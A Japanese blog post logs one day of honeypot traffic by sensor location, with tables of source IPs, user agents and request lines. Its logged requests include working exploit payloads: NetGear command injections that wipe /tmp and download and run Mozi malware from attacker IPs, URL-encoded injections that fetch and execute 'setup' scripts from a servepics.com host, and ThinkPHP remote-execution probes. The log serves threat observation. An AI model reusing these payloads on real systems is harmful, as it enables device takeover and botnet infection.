2021/05/10 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2021/05/10分です。

特徴

共通

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為

Location：JP

NetGear製品の脆弱性を狙うアクセス
ZmEuによるスキャン行為
.cssへのスキャン行為
.jsへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
WordPressへのスキャン行為
WordPress Pluginへのスキャン行為
50[.]116[.]40[.]247に関する不正通信
UserAgentがHello, Worldであるアクセス
を確認しました。

Location：US

Oracle WebLogicの脆弱性(CVE-2019-2725)を狙うアクセス
Apache Tomcatへのスキャン行為
WordPress Pluginへのスキャン行為
を確認しました。

Location：UK

Genexis PLATINUMの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
TerraMaster TOSの脆弱性を狙うアクセス
Oracle WebLogicの脆弱性(CVE-2020-14882,CVE-2020-14883,CVE-2020-14750)を狙うアクセス
Nmap Scripting Engineによるスキャン行為
ZmEuによるスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。

Location：SG

NetGear製品の脆弱性を狙うアクセス
ZmEuによるスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
WordPress Pluginへのスキャン行為
を確認しました。

他

アクセス数推移

JP：総アクセス数：216 (前日比：-36)
US：総アクセス数：72 (前日比：-62)
UK：総アクセス数：159 (前日比：+137)
SG：総アクセス数：68 (前日比：+34)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	20.185.62.234	United States
1	27.202.19.146	China
1	36.90.22.72	Indonesia
1	37.59.75.129	France
1	37.120.234.18	Romania
1	41.251.202.73	Morocco
2	45.81.233.87	Germany
11	45.155.205.181	Russia
5	51.159.22.171	France
2	52.15.81.142	United States
2	64.227.3.111	United States
1	68.183.9.43	United States
7	103.68.62.108	Hong Kong
6	104.248.139.5	United States
1	111.38.123.18	China
1	117.213.46.104	India
4	132.145.151.103	United States
2	132.145.196.125	United States
1	139.162.145.250	Netherlands
150	152.32.171.98	Hong Kong
1	168.63.75.113	United States
1	172.104.242.173	United States
1	172.105.89.161	United States
1	174.138.21.243	United States
2	176.111.173.82	Estonia
1	180.149.125.175	Mongolia
1	183.136.225.14	China
1	188.166.70.83	United States
1	192.241.216.221	United States
1	192.241.217.230	United States
2	205.185.122.102	United States
2	212.83.158.52	France

UserAgent一覧

件数	UserAgent
51	-
2	Hello, World
7	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
109	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
1	Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
13	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2	Mozilla/5.0 zgrab/0.x
13	ZmEu
1	python-requests/2.18.4

リクエスト内容一覧

件数	Method	Request	Protocol
42		-
2		\x03
1		\x16\x03\x01
2		\x16\x03\x01\x01\xfa\x01
2	CONNECT	50[.]116[.]40[.]247:4444	HTTP/1.1
14	GET	/.env	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=q1sftuoi	HTTP/1.1
1	GET	/Content/css/wzwstylel.css	HTTP/1.1
1	GET	/Home/Get/getJnd28	HTTP/1.1
1	GET	/Home/Index/ajaxTJ	HTTP/1.1
2	GET	/MyAdmin/scripts/setup.php	HTTP/1.1
1	GET	/Promotions/list.mvc	HTTP/1.1
1	GET	/Public/Home/ecshe_css/main.css?v=1543997196	HTTP/1.1
1	GET	/Public/Home/js/cls.js	HTTP/1.1
1	GET	/Public/css/_pk10.css	HTTP/1.1
1	GET	/Public/home/wap/css/qdgame.css	HTTP/1.1
1	GET	/Public/initJs.php	HTTP/1.1
1	GET	/Public/mobile/js/config.js	HTTP/1.1
1	GET	/Scripts/common.js	HTTP/1.1
1	GET	/Template/Mobile/js/main.js	HTTP/1.1
2	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/actuator/health	HTTP/1.1
1	GET	/admin	HTTP/1.1
1	GET	/admin/	HTTP/1.1
1	GET	/admin_user/m_tixian.php	HTTP/1.1
1	GET	/api/apps	HTTP/1.1
1	GET	/api/common/getConfig	HTTP/1.1
1	GET	/api/config-init	HTTP/1.1
1	GET	/api/content_bottom	HTTP/1.1
1	GET	/api/currency/quotation_new	HTTP/1.1
1	GET	/api/exclude/siteConfig/webSiteConfig	HTTP/1.1
1	GET	/api/index/loansList	HTTP/1.1
1	GET	/api/message/webInfo	HTTP/1.1
1	GET	/api/mobile/checkStrategyHistory	HTTP/1.1
1	GET	/api/site/getInfo.do	HTTP/1.1
1	GET	/api/stock/getSingleStock.do?code=002405	HTTP/1.1
1	GET	/api/user/ismustmobile	HTTP/1.1
1	GET	/api/v/index/queryOfficePage?officeCode=customHomeLink	HTTP/1.1
1	GET	/api/wallet/redDetail	HTTP/1.1
1	GET	/api/web/user/getIndexData.php	HTTP/1.1
1	GET	/assets/extension/market/css/mt4.css	HTTP/1.1
1	GET	/assets/js/dmshub.js	HTTP/1.1
1	GET	/base/exchange_article/index/classid/1/id/1	HTTP/1.1
1	GET	/base/goexjs	HTTP/1.1
1	GET	/c/	HTTP/1.1
1	GET	/common/member/js/user.util.js	HTTP/1.1
1	GET	/config.js	HTTP/1.1
1	GET	/config.php?_=3283&1922563758	HTTP/1.1
2	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/cq/css/cssy.css	HTTP/1.1
1	GET	/cq/kehulistajax.php	HTTP/1.1
1	GET	/cscpLoginWeb/app/home	HTTP/1.1
1	GET	/css/all.css	HTTP/1.1
1	GET	/css/dafa.css	HTTP/1.1
1	GET	/css/info.css	HTTP/1.1
1	GET	/css/style.css	HTTP/1.1
1	GET	/favicon.ico	HTTP/1.1
1	GET	/friendGroup/list	HTTP/1.1
1	GET	/getConfig/getArticle.do?code=1	HTTP/1.1
1	GET	/getConfig/listPopFrame.do?code=1&position=index&_=1601489645097	HTTP/1.1
1	GET	/h5/	HTTP/1.1
1	GET	/home/GetQrCodeInfo	HTTP/1.1
1	GET	/home/main/login	HTTP/1.1
1	GET	/hudson	HTTP/1.1
1	GET	/images/src_images_but_dianz_s.png	HTTP/1.1
1	GET	/index.php/Index/register.html	HTTP/1.1
1	GET	/index.php?m=api&c=app&a=getPlatformConfig	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/index/Mobile/fenshi?code=sz002405	HTTP/1.1
1	GET	/index/Mobile/kline_week?code=sz003043	HTTP/1.1
1	GET	/infe/rest/flash/getServerIP.json	HTTP/1.1
1	GET	/ipl/app/flash/publicbmw/ball/FigLeaf.js?site=member	HTTP/1.1
1	GET	/jenkins/login	HTTP/1.1
1	GET	/jiaoyimao/default.css	HTTP/1.1
1	GET	/js/base.js	HTTP/1.1
1	GET	/js/chat/chat.js	HTTP/1.1
1	GET	/js/config20181225.js	HTTP/1.1
1	GET	/js/tvConfig.js	HTTP/1.1
1	GET	/kkrps/im_group/show_members	HTTP/1.1
1	GET	/langConfig.js	HTTP/1.1
1	GET	/lanren/css/global.css	HTTP/1.1
1	GET	/loan	HTTP/1.1
1	GET	/locale/Goex/zh/common.js	HTTP/1.1
1	GET	/login	HTTP/1.1
1	GET	/login/img/nyyh/chkjs.js	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
1	GET	/manager/js/left.js	HTTP/1.1
1	GET	/market/getStockBaseInfo?stockCodeInternal=2658	HTTP/1.1
1	GET	/member/js/lang_zh_CN.js	HTTP/1.1
1	GET	/mobile/config.js	HTTP/1.1
1	GET	/mtja.html	HTTP/1.1
1	GET	/myConfig.js	HTTP/1.1
2	GET	/myadmin/scripts/setup.php	HTTP/1.1
1	GET	/nyyh/game.css	HTTP/1.1
1	GET	/other/codepay/js/codepay_util.js	HTTP/1.1
1	GET	/pages/console/js/common.js	HTTP/1.1
2	GET	/phpMyAdmin/scripts/setup.php	HTTP/1.1
3	GET	/phpmyadmin/scripts/setup.php	HTTP/1.1
2	GET	/pma/scripts/setup.php	HTTP/1.1
1	GET	/public/admin.php/api/index/loansList	HTTP/1.1
1	GET	/public/web/css/add//index.css	HTTP/1.1
1	GET	/public/web/js/add/com.js	HTTP/1.1
1	GET	/resources/css/headernav.css	HTTP/1.1
1	GET	/resources/main/common.js	HTTP/1.1
1	GET	/room/getRoomBangFans	HTTP/1.1
1	GET	/s_api/basic/download/info	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//117[.]213[.]46[.]104:46474/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/site/get-hq?proNo=btc&panType=1&pid=1	HTTP/1.1
1	GET	/skin/js/common.js	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/static/common/js/common.js	HTTP/1.1
1	GET	/static/common/js/global.js	HTTP/1.1
1	GET	/static/css/index.css	HTTP/1.1
1	GET	/static/data/thirdgames.json	HTTP/1.1
1	GET	/static/diff_worker.js	HTTP/1.1
1	GET	/static/guide/ab.css	HTTP/1.1
1	GET	/static/index/css/iindex.css	HTTP/1.1
1	GET	/static/login/js/lk/order.js	HTTP/1.1
1	GET	/static/wap/css/index.css	HTTP/1.1
1	GET	/static/wap/js/common.js	HTTP/1.1
1	GET	/statics/js/API.js	HTTP/1.1
1	GET	/stock/search.html?keyword=00202	HTTP/1.1
1	GET	/template/920ka/js/woodyapp.js	HTTP/1.1
1	GET	/user/Login	HTTP/1.1
1	GET	/user/userlist	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/views/commData/commonSite.js	HTTP/1.1
1	GET	/views/home/home.js	HTTP/1.1
2	GET	/w00tw00t.at.blackhats.romanian.anti-sec:)	HTTP/1.1
1	GET	/wap/api/exchangerateuserconfig!get.action	HTTP/1.1
1	GET	/web/api/getBanner	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	/wp-login.php	HTTP/1.1
1	GET	/zz2/address.php?gid=651	HTTP/1.1
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
2	POST	/GponForm/diag_Form?images/	HTTP/1.1
1	POST	/_ignition/execute-solution	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/api/system/system/config/get	HTTP/1.1
2	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/m.api	HTTP/1.1
1	POST	/user/login	HTTP/1.1
2	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1		\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
4	1.116.223.165	China
1	37.120.147.42	Romania
3	45.33.41.11	United States
11	45.155.205.181	Russia
1	46.249.32.208	Netherlands
2	64.227.3.111	United States
1	84.17.59.70	United Kingdom
1	113.89.53.13	China
1	132.145.151.103	United States
1	139.162.145.250	Netherlands
3	163.172.168.251	United Kingdom
1	172.104.242.173	United States
2	176.111.173.82	Estonia
1	178.175.85.157	Albania
1	180.149.125.175	Mongolia
1	183.136.225.14	China
25	185.128.41.50	Panama
4	185.142.236.36	Seychelles
1	192.241.214.86	United States
1	192.241.214.140	United States
1	192.241.220.33	United States
4	198.20.69.98	United States
1	205.185.122.102	United States

UserAgent一覧

件数	UserAgent
17	-
12	Java/1.8.0_131
4	Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)
2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36
8	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Hutool
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
1	Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
1	Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
4	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
2	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
3	Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数	Method	Request	Protocol
2		\x03
1		\x16\x03\x01
1		\x16\x03\x01\x02
2		\x17\x03\x01\x01\x04e
1		\xbf\xbf\xaf\xaf~
1	CONNECT	www[.]bing[.]com/:443	HTTP/1.1
2	GET	/.env	HTTP/1.1
2	GET	/.well-known/security.txt	HTTP/1.1
1	GET	/0bef	HTTP/1.0
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
1	GET	/_async/AsyncResponseService	HTTP/1.1
1	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/actuator/health	HTTP/1.1
1	GET	/boaform/admin/formLogin?username=adminisp&psd=adminisp	HTTP/1.0
1	GET	/c/	HTTP/1.1
1	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
3	GET	/favicon.ico	HTTP/1.1
1	GET	/html/public/index.php	HTTP/1.1
1	GET	/hudson	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/index.php?s=index/\think\Request/input&filter=phpinfo&data=1	HTTP/1.1
1	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1]=phpinfo()	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/public/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/public/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/public/?s=index/\think\Request/input&filter=phpinfo&data=1	HTTP/1.1
1	GET	/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1]=phpinfo()	HTTP/1.1
1	GET	/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
2	GET	/robots.txt	HTTP/1.1
2	GET	/sitemap.xml	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/thinkphp/html/public/index.php	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	http[:]//www[.]bing[.]com/	HTTP/1.1
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
1	POST	/HNAP1/	HTTP/1.0
1	POST	/api/jsonws/invoke	HTTP/1.1
3	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/index	HTTP/1.1
1	POST	/index.action	HTTP/1.1
1	POST	/index.do	HTTP/1.1
1	POST	/index.jsp	HTTP/1.1
4	POST	/invoker/readonly	HTTP/1.1
1	POST	/login	HTTP/1.1
1	POST	/login.action	HTTP/1.1
1	POST	/login.do	HTTP/1.1
1	POST	/login.jsp	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	http[:]//pomidorowa[.]xyz/a6dcb2f704228b94726c06105ed435d89c52aa2d8044dcefcc38058467b9f85c51558b44986ef59c53061617ab421a9cd477e43e08098089f8060bc58b3c6aaf75c743dba229d5cba6f9761ec40723027a3f702b1c381b36acb11280a681992e	HTTP/1.1

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	18.157.179.218	United States
2	20.86.136.186	United States
1	39.87.152.122	China
1	42.224.7.217	China
1	45.143.99.69	Turkey
11	45.155.205.181	Russia
3	46.101.91.209	United States
2	51.104.242.82	United Kingdom
1	59.97.175.153	India
2	64.227.3.111	United States
1	66.240.205.34	United States
1	84.53.229.139	Russia
1	112.248.60.218	China
1	115.55.17.124	China
1	120.85.99.36	China
24	132.145.33.229	United States
23	132.145.49.107	United States
3	139.177.195.74	United States
62	140.238.88.136	United States
1	172.83.40.70	United States
1	172.104.242.173	United States
2	176.111.173.82	Estonia
1	180.149.125.175	Mongolia
1	192.241.218.136	United States
1	192.241.218.197	United States
2	194.165.16.82	Russia
4	198.20.70.114	United States
1	205.185.122.102	United States
1	207.154.234.72	United States
2	212.83.158.52	France

UserAgent一覧

件数	UserAgent
19	-
1	Go-http-client/1.1
1	Hello, World
2	Mozilla 5/0
11	Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
6	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)
6	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
6	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
6	Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
1	Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
6	Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
6	Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1
2	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
2	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
62	Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
2	Mozilla/5.0 zgrab/0.x
2	ZmEu
1	python-requests/2.18.4

リクエスト内容一覧

件数	Method	Request	Protocol
1		Gh0st\xad
2		\x03
4		\x17\x03\x01\x01\x04e
2		\xbf\xbf\xaf\xaf~
4	GET	/.env	HTTP/1.1
1	GET	/.git/HEAD	HTTP/1.1
1	GET	/.well-known/security.txt	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/HNAP1	HTTP/1.1
2	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/actuator/health	HTTP/1.1
1	GET	/api/spec.json	HTTP/1.1
1	GET	/assets/css/style.min.css	HTTP/1.1
1	GET	/boaform/admin/formLogin?username=user&psd=user	HTTP/1.0
1	GET	/c/	HTTP/1.1
1	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/console/css/%252E%252E%252Fconsole.portal	HTTP/1.1
1	GET	/console/css/%252e%252e%252fconsole.portal	HTTP/1.1
1	GET	/console/images/%252E%252E%252Fconsole.portal	HTTP/1.1
1	GET	/console/images/%252e%252e%252fconsole.portal	HTTP/1.1
3	GET	/favicon.ico	HTTP/1.1
1	GET	/hudson	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/nmaplowercheck1620537463	HTTP/1.1
1	GET	/phpMyAdmin/scripts/setup.php	HTTP/1.1
1	GET	/phpmyadmin/scripts/setup.php	HTTP/1.1
3	GET	/robots.txt	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//59[.]97[.]175[.]153:54570/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/sitemap.xml	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/spec/api.json	HTTP/1.1
1	GET	/ui	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/phpunit.xml	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/wp-content/	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	HEAD	/actuator	HTTP/1.1
1	HEAD	/actuator/auditevents	HTTP/1.1
1	HEAD	/actuator/beans	HTTP/1.1
1	HEAD	/actuator/conditions	HTTP/1.1
1	HEAD	/actuator/configprops	HTTP/1.1
1	HEAD	/actuator/env	HTTP/1.1
1	HEAD	/actuator/health	HTTP/1.1
1	HEAD	/actuator/heapdump	HTTP/1.1
1	HEAD	/actuator/httptrace	HTTP/1.1
1	HEAD	/actuator/hystrix.stream	HTTP/1.1
1	HEAD	/actuator/info	HTTP/1.1
1	HEAD	/actuator/jolokia	HTTP/1.1
1	HEAD	/actuator/loggers	HTTP/1.1
1	HEAD	/actuator/mappings	HTTP/1.1
1	HEAD	/actuator/metrics	HTTP/1.1
1	HEAD	/actuator/scheduledtasks	HTTP/1.1
1	HEAD	/actuator/threaddump	HTTP/1.1
1	HEAD	/auditevents	HTTP/1.1
1	HEAD	/autoconfig	HTTP/1.1
1	HEAD	/beans	HTTP/1.1
1	HEAD	/cloudfoundryapplication	HTTP/1.1
1	HEAD	/configprops	HTTP/1.1
1	HEAD	/dump	HTTP/1.1
1	HEAD	/env	HTTP/1.1
1	HEAD	/health	HTTP/1.1
1	HEAD	/heapdump	HTTP/1.1
1	HEAD	/hystrix.stream	HTTP/1.1
1	HEAD	/info	HTTP/1.1
1	HEAD	/jolokia	HTTP/1.1
1	HEAD	/loggers	HTTP/1.1
1	HEAD	/mappings	HTTP/1.1
1	HEAD	/metrics	HTTP/1.1
1	HEAD	/threaddump	HTTP/1.1
1	HEAD	/trace	HTTP/1.1
1	IDQW	/	HTTP/1.1
11	OPTIONS	/	HTTP/1.1
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
1	POST	/GponForm/diag_Form?images/	HTTP/1.1
4	POST	/HNAP1/	HTTP/1.0
8	POST	/api/jsonws/expandocolumn/update-column	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
2	POST	/boaform/admin/formLogin	HTTP/1.1
7	POST	/include/makecvs.php?Event=%60php%20-r%20%22file_put_contents%28%5C%22setup%5C%22%2C%20file_get_contents%28%5C%22http%3A%2F%2Fcan6dodp.servepics.com%2Fsetup%5C%22%29%29%3B%22%3Bcurl%20http%3A%2F%2Fcan6dodp.servepics.com%2Fsetup%20-O%3Bcurl%20http%3A%2F%2Fcan6dodp.servepics.com%2Fsetup.py%20-O%3Bphp%20-r%20%22file_put_contents%28%5C%22setup.py%5C%22%2C%20file_get_contents%28%5C%22http%3A%2F%2Fcan6dodp.servepics.com%2Fsetup.py%5C%22%29%29%3B%22%3Bwget%20http%3A%2F%2Fcan6dodp.servepics.com%2Fsetup%20-O%20setup%3Bwget%20http%3A%2F%2Fcan6dodp.servepics.com%2Fsetup.py%20-O%20setup.py%3Bchmod%20777%20setup.py%3Bchmod%20777%20setup%3Bpython2%20setup.py%7C%7Cpython2.7%20setup.py%7C%7Cpython%20setup.py%7C%7C.%2Fsetup.py%7C%7C.%2Fsetup%60	HTTP/1.1
1	POST	/sdk	HTTP/1.1
7	POST	/sys_config_valid.xgi?exeshell=%60php%20-r%20%22file_put_contents%28%5C%22setup%5C%22%2C%20file_get_contents%28%5C%22http%3A%2F%2Fcan6dodp.servepics.com%2Fsetup%5C%22%29%29%3B%22%3Bcurl%20http%3A%2F%2Fcan6dodp.servepics.com%2Fsetup%20-O%3Bcurl%20http%3A%2F%2Fcan6dodp.servepics.com%2Fsetup.py%20-O%3Bphp%20-r%20%22file_put_contents%28%5C%22setup.py%5C%22%2C%20file_get_contents%28%5C%22http%3A%2F%2Fcan6dodp.servepics.com%2Fsetup.py%5C%22%29%29%3B%22%3Bwget%20http%3A%2F%2Fcan6dodp.servepics.com%2Fsetup%20-O%20setup%3Bwget%20http%3A%2F%2Fcan6dodp.servepics.com%2Fsetup.py%20-O%20setup.py%3Bchmod%20777%20setup.py%3Bchmod%20777%20setup%3Bpython2%20setup.py%7C%7Cpython2.7%20setup.py%7C%7Cpython%20setup.py%7C%7C.%2Fsetup.py%7C%7C.%2Fsetup%60	HTTP/1.1
8	POST	/ui/vropspluginui/rest/services/uploadova	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	/version	HTTP/1.1
16	POST	/zend3/public/	HTTP/1.1
3	PROPFIND	/	HTTP/1.1
1		\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	20.194.24.199	United States
1	45.133.1.162	Netherlands
11	45.155.205.181	Russia
1	46.151.156.206	Russia
2	46.249.32.208	Netherlands
6	51.159.22.171	France
1	52.154.74.227	United States
2	64.227.3.111	United States
5	73.35.196.45	United States
10	112.115.57.23	China
3	139.59.191.249	Singapore
1	139.162.145.250	Netherlands
1	147.135.115.235	United States
6	163.172.159.134	United Kingdom
3	167.99.169.205	United States
1	172.105.89.161	United States
2	176.111.173.82	Estonia
1	180.149.125.175	Mongolia
1	183.188.228.208	China
1	188.166.70.83	United States
1	192.241.209.242	United States
1	192.241.220.63	United States
2	205.185.122.102	United States
4	212.83.158.52	France

UserAgent一覧

件数	UserAgent
13	-
1	Go-http-client/1.1
5	Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
